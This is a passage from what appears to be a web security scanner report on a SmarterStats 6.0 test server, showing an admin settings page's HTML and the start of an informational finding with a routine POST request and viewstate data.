                       <option value="18">Delete after 18 months</option>
                       <option value="19">Delete after 19 months</option>
                       <option value="20">Delete after 20 months</option>
                       <option value="21">Delete after 21 months</option>
                       <option value="22">Delete after 22 months</option>
                       <option value="23">Delete after 23 months</option>
                       <option value="24">Delete after 24 months</option>
                       <option value="25">Delete after 25 months</option>
                       <option value="26">Delete after 26 months</option>
                       <option value="27">Delete after 27 months</option>
                       <option value="28">Delete after 28 months</option>
                       <option value="29">Delete after 29 months</option>
                       <option value="30">Delete after 30 months</option>
                       <option value="31">Delete after 31 months</option>
                       <option value="32">Delete after 32 months</option>
                       <option value="33">Delete after 33 months</option>
                       <option value="34">Delete after 34 months</option>
                       <option value="35">Delete after 35 months</option>
                       <option value="36">Delete after 36 months</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_lstDefaultLogFileDays">
                   <td id="ctl00_MPH_lstDefaultLogFileDays_Label" class="Indent Fixed">Original Logs</td><td id="ctl00_MPH_lstDefaultLogFileDays_Setting" class="Setting"><select name="ctl00$MPH$lstDefaultLogFileDays_SettingDropDown" id="ctl00_MPH_lstDefaultLogFileDays_SettingDropDown">
                       <option value="0">Never Delete</option>
                       <option selected="selected" value="1">Delete after 1 days</option>
                       <option value="2">Delete after 2 days</option>
                       <option value="3">Delete after 3 days</option>
                       <option value="4">Delete after 4 days</option>
                       <option value="5">Delete after 5 days</option>
                       <option value="6">Delete after 6 days</option>
                       <option value="7">Delete after 7 days</option>
                       <option value="8">Delete after 8 days</option>
                       <option value="9">Delete after 9 days</option>
                       <option value="10">Delete after 10 days</option>
                       <option value="11">Delete after 11 days</option>
                       <option value="12">Delete after 12 days</option>
                       <option value="13">Delete after 13 days</option>
                       <option value="14">Delete after 14 days</option>
                       <option value="21">Delete after 21 days</option>
                       <option value="30">Delete after 1 months</option>
                       <option value="60">Delete after 2 months</option>
                       <option value="90">Delete after 3 months</option>
                       <option value="120">Delete after 4 months</option>
                       <option value="150">Delete after 5 months</option>
                       <option value="180">Delete after 6 months</option>
                       <option value="210">Delete after 7 months</option>
                       <option value="240">Delete after 8 months</option>
                       <option value="270">Delete after 9 months</option>
                       <option value="300">Delete after 10 months</option>
                       <option value="330">Delete after 11 months</option>
                       <option value="360">Delete after 12 months</option>
                       <option value="390">Delete after 13 months</option>
                       <option value="420">Delete after 14 months</option>
                       <option value="450">Delete after 15 months</option>
                       <option value="480">Delete after 16 months</option>
                       <option value="510">Delete after 17 months</option>
                       <option value="540">Delete after 18 months</option>
                       <option value="570">Delete after 19 months</option>
                       <option value="600">Delete after 20 months</option>
                       <option value="630">Delete after 21 months</option>
                       <option value="660">Delete after 22 months</option>
                       <option value="690">Delete after 23 months</option>
                       <option value="720">Delete after 24 months</option>
                       <option value="750">Delete after 25 months</option>
                       <option value="780">Delete after 26 months</option>
                       <option value="810">Delete after 27 months</option>
                       <option value="840">Delete after 28 months</option>
                       <option value="870">Delete after 29 months</option>
                       <option value="900">Delete after 30 months</option>
                       <option value="930">Delete after 31 months</option>
                       <option value="960">Delete after 32 months</option>
                       <option value="990">Delete after 33 months</option>
                       <option value="1020">Delete after 34 months</option>
                       <option value="1050">Delete after 35 months</option>
                       <option value="1080">Delete after 36 months</option>

                   </select></td>
               </tr>
           </table>
               </span></div>
       
               <div id='ctl00_MPH_SeoOptionsTab' class='' style='display:none'>
           <span id="ctl00_MPH_SeoOptionsTab">
                   <table id="ctl00_MPH_ucSiteSeoSettings_tblSEO" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords">
                   <td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_Label" class="Indent Fixed">Max Keywords</td><td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_Setting" class="Setting"><input name="ctl00$MPH$ucSiteSeoSettings$txtSeoMaxKeywords_SettingText" type="text" value="5" size="3" id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors">
                   <td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_Label" class="Indent Fixed">Max Competitors</td><td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_Setting" class="Setting"><input name="ctl00$MPH$ucSiteSeoSettings$txtSeoMaxCompetitors_SettingText" type="text" value="5" size="3" id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking">
                   <td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_Label" class="Indent Fixed">Max Position to Retrieve</td><td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_Setting" class="Setting"><input name="ctl00$MPH$ucSiteSeoSettings$txtSeoMaxRanking_SettingText" type="text" value="100" size="3" id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_SettingText" class="text" /></td>
               </tr>
           </table>
                   <table id="ctl00_MPH_ucSiteSeoSearchEngineSettings_tblSeoSearchEngines" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines">
                   <td id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_Label" class="Indent Fixed">Search Engines</td><td id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_Setting" class="Setting"><table id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox" class="CheckboxList" border="0">
                       <tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_0" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$0" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_0">Google</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_8" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$8" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_8">Google (DE)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_15" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$15" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_15">Google (JP)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_1" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$1" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_1">Yahoo</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_9" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$9" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_9">Google (ES)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_16" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$16" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_16">Google (KR)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_2" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$2" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_2">Ask</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_10" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$10" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_10">Google (FR)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_17" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$17" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_17">Google (MX)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_3" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$3" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_3">Bing</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_11" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$11" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_11">Google (HK)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_18" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$18" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_18">Google (NL)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_4" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$4" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_4">Google (AU)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_12" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$12" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_12">Google (IN)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_19" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$19" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_19">Google (TW)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_5" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$5" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_5">Google (BR)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_13" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$13" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_13">Google (IL)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_20" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$20" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_20">Google (RU)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_6" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$6" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_6">Google (CA)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_14" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$14" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_14">Google (IT)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_21" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$21" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_21">Google (UK)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_7" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$7" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_7">Google (CN)</label></td><td></td><td></td>
                       </tr>
                   </table></td>
               </tr>
           </table>

               </span></div>
       
           </div>
   
       
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('admin/defaults/frmdefaultsitesettings', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   

<script type="text/javascript">
//<![CDATA[
$(function() { SetTopTitle('Site\x20Defaults'); });
$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_OptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_AutoDeletionTab","ctl00_TPH_HyperTabStrip1_HyperTabItem3":"ctl00_MPH_SeoOptionsTab"},"ClientCallbacks":{}}); });
modules['vmNotBlank_txt']='Must have a value';
$(function() {$vc({"lt":"SmarterLog Path","vcID":"ctl00_MPH_txtDefaultSmarterLogDirText_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
$(function() {$vc({"lt":"Default Documents (one per line)","vcID":"ctl00_MPH_txtDefaultDocuments_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
modules['vmNumber_txt']='Must be a number';
modules['vmNumberGreater_txt']='Must be {0} or greater';
$(function() {$vc({"lt":"Max Keywords","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Max Competitors","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Max Position to Retrieve","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
//]]>
</script>
</form>
</body>
</html>


11.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/Defaults/frmServerDefaults.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/Defaults/frmServerDefaults.aspx

Request

POST /Admin/Defaults/frmServerDefaults.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/Defaults/frmServerDefaults.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"208759633","TopBarSection":"AdminSettings"}; ASP.NET_SessionId=goyfjk5bgnfdbekr0r35mk2c;
Content-Type: application/x-www-form-urlencoded
Content-Length: 9425

ctl00%24MPH%24ImportingServerFields1%24lstBasePriority_SettingDropDown=belownormal&ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput_ClientState=&ctl00%24MPH%24ImportingServerFields1%24lstCompressionLevel_SettingDropDown=1&ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_ClientState=&ctl00%24MPH%24ImportingServerFields1%24tfDateRangePicker_SettingText2%24dateInput=2010-10-12-23-59-00&ctl00%24MPH%24ImportingServerFields1%24txtSessionTimeout_SettingText=15&ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput_text=11%3a59+PM&ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timeView_ClientState=&ctl00%24MPH%24ImportingServerFields1%24txtDebugLevel_SettingText=10&ctl00%24MPH%24ImportingServerFields1%24txtRowSleepTime_SettingText=1&ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput_ClientState=&ctl00%24MPH%24ImportingServerFields1%24tfDateRangePicker_SettingText1=2010-10-12-00-00-00&__EVENTTARGET=&ctl00%24MPH%24ImportingServerFields1%24tfDateRangePicker_SettingText2=2010-10-12-23-59-00&__EVENTARGUMENT=&ctl00%24MPH%24ImportingServerFields1%24tfDateRangePicker_SettingText1%24dateInput=2010-10-12-00-00-00&ctl00%24MPH%24ImportingServerFields1%24txtReaderThreads_SettingText=1&ctl00%24MPH%24ImportingServerFields1%24txtMaxSessions_SettingText=100000&ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput_text=12%3a00+AM&ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_ClientState=&__VIEWSTATE=%2fwEPDwULLTIwMTEzMzc4OTMPFgQeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgoCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTseB1Zpc2libGVoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCA8WAh8DaGQCCQ9kFgICAQ9kFgJmD2QWAgIBD2QWAmYPZBYWZg9kFgICAQ9kFgQCAQ8PFhAeHEVuYWJsZUVtYmVkZGVkQmFzZVN0eWxlc2hlZXRoHhNFbmFibGVFbWJlZGRlZFNraW5zaB4EU2tpbgUMU21hcnRlclRvb2xzHgdNYXhEYXRlBgAA25l6PzEJHgRfIVNCAgIeDFNlbGVjdGVkRGF0ZQYAADaMtzfNCB4IQ3NzQ2xhc3MFElRpbWVQaWNrZXJPdmVycmlkZR4HTWluRGF0ZQYAQFcgUwVRCGQWCmYPFCsACA8WFh4NT3JpZ2luYWxWYWx1ZQUIMTI6MDAgQU0fBmgfBwUMU21hcnRlclRvb2xzHwgGAADbmXo%2fMQkeCkRhdGVGb3JtYXQFAXQeEURpc3BsYXlEYXRlRm9ybWF0BQF0HwQFEzIwMTAtMTAtMTItMDAtMDAtMDAeDUxhYmVsQ3NzQ2xhc3MFB3JpTGFiZWweF0VuYWJsZUFqYXhTa2luUmVuZGVyaW5naB8FaB8MBgBAVyBTBVEIZBYGHgVXaWR0aBsAAAAAAABZQAcAAAAfCwURcmlUZXh0Qm94IHJpSG92ZXIfCQKCAhYGHxIbAAAAAAAAWUAHAAAAHwsFEXJpVGV4dEJveCByaUVycm9yHwkCggIWBh8SGwAAAAAAAFlABwAAAB8LBRNyaVRleHRCb3ggcmlGb2N1c2VkHwkCggIWBh8SGwAAAAAAAFlABwAAAB8LBRNyaVRleHRCb3ggcmlFbmFibGVkHwkCggIWBh8SGwAAAAAAAFlABwAAAB8LBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8JAoICFgYfEhsAAAAAAABZQAcAAAAfCwURcmlUZXh0Qm94IHJpRW1wdHkfCQKCAhYGHxIbAAAAAAAAWUAHAAAAHwsFEHJpVGV4dEJveCByaVJlYWQfCQKCAmQCAQ8PFgIfA2hkZAICDzwrAA0BAA8WCAURRW5hYmxlTXVsdGlTZWxlY3RoBQRNaW5EBgBAVyBTBVEIBQ9SZW5kZXJJbnZpc2libGVnBQRNYXhEBgAA25l6PzEJDxYIHwVoHwZoHwcFDFNtYXJ0ZXJUb29scx8DaGRkAgMPDxYEHghJbWFnZVVybAUtL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvVXBjb21pbmcuZ2lmHg1Ib3ZlckltYWdlVXJsBS0vQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9VcGNvbWluZy5naWYWAh4Hb25jbGljawVmcmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9JbXBvcnRpbmdTZXJ2ZXJGaWVsZHMxX3RmRGF0ZVJhbmdlUGlja2VyX1NldHRpbmdUZXh0MScpLCd0aW1lJyk7ZAIEDxQrAAIPFg4fBWgfBmgeCVN0YXJ0VGltZSgpXFN5c3RlbS5UaW1lU3BhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaW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%2fMQkPFggfBWgfBmgfBwUMU21hcnRlclRvb2xzHwNoZGQCAw8PFgQfEwUtL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvVXBjb21pbmcuZ2lmHxQFLS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L1VwY29taW5nLmdpZhYCHxUFZnJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfSW1wb3J0aW5nU2VydmVyRmllbGRzMV90ZkRhdGVSYW5nZVBpY2tlcl9TZXR0aW5nVGV4dDInKSwndGltZScpO2QCBA8UKwACDxYOHwVoHwZoHxYoKwQIMDc6MDA6MDAfFygrBAgxOTowMDowMB8YKCsECDAwOjE1OjAwHwcFDFNtYXJ0ZXJUb29scx8RaGQWBB8LBQdyY0hvdmVyHwkCAhYCZg8UKwAJDxYGHxkCBB8aFgAfGwIwZBYEHwtlHwkCAmQWBB8LZR8JAgJkZBYEHwsFCHJjSGVhZGVyHwkCAhYEHwsFCHJjRm9vdGVyHwkCAhYGHxIbAAAAAABAb0ABAAAAHwsFNFJhZENhbGVuZGFyVGltZVZpZXcgUmFkQ2FsZW5kYXJUaW1lVmlld19TbWFydGVyVG9vbHMfCQKCAhZgAgEPZBYCZg8WAh8cBQc3OjAwIEFNZAICD2QWAmYPFgIfHAUHNzoxNSBBTWQCAw9kFgJmDxYCHxwFBzc6MzAgQU1kAgQPZBYCZg8WAh8cBQc3OjQ1IEFNZAIFD2QWAmYPFgIfHAUHODowMCBBTWQCBg9kFgJmDxYCHxwFBzg6MTUgQU1kAgcPZBYCZg8WAh8cBQc4OjMwIEFNZAIID2QWAmYPFgIfHAUHODo0NSBBTWQCCQ9kFgJmDxYCHxwFBzk6MDAgQU1kAgoPZBYCZg8WAh8cBQc5OjE1IEFNZAILD2QWAmYPFgIfHAUHOTozMCBBTWQCDA9kFgJmDxYCHxwFBzk6NDUgQU1kAg0PZBYCZg8WAh8cBQgxMDowMCBBTWQCDg9kFgJmDxYCHxwFCDEwOjE1IEFNZAIPD2QWAmYPFgIfHAUIMTA6MzAgQU1kAhAPZBYCZg8WAh8cBQgxMDo0NSBBTWQCEQ9kFgJmDxYCHxwFCDExOjAwIEFNZAISD2QWAmYPFgIfHAUIMTE6MTUgQU1kAhMPZBYCZg8WAh8cBQgxMTozMCBBTWQCFA9kFgJmDxYCHxwFCDExOjQ1IEFNZAIVD2QWAmYPFgIfHAUIMTI6MDAgUE1kAhYPZBYCZg8WAh8cBQgxMjoxNSBQTWQCFw9kFgJmDxYCHxwFCDEyOjMwIFBNZAIYD2QWAmYPFgIfHAUIMTI6NDUgUE1kAhkPZBYCZg8WAh8cBQcxOjAwIFBNZAIaD2QWAmYPFgIfHAUHMToxNSBQTWQCGw9kFgJmDxYCHxwFBzE6MzAgUE1kAhwPZBYCZg8WAh8cBQcxOjQ1IFBNZAIdD2QWAmYPFgIfHAU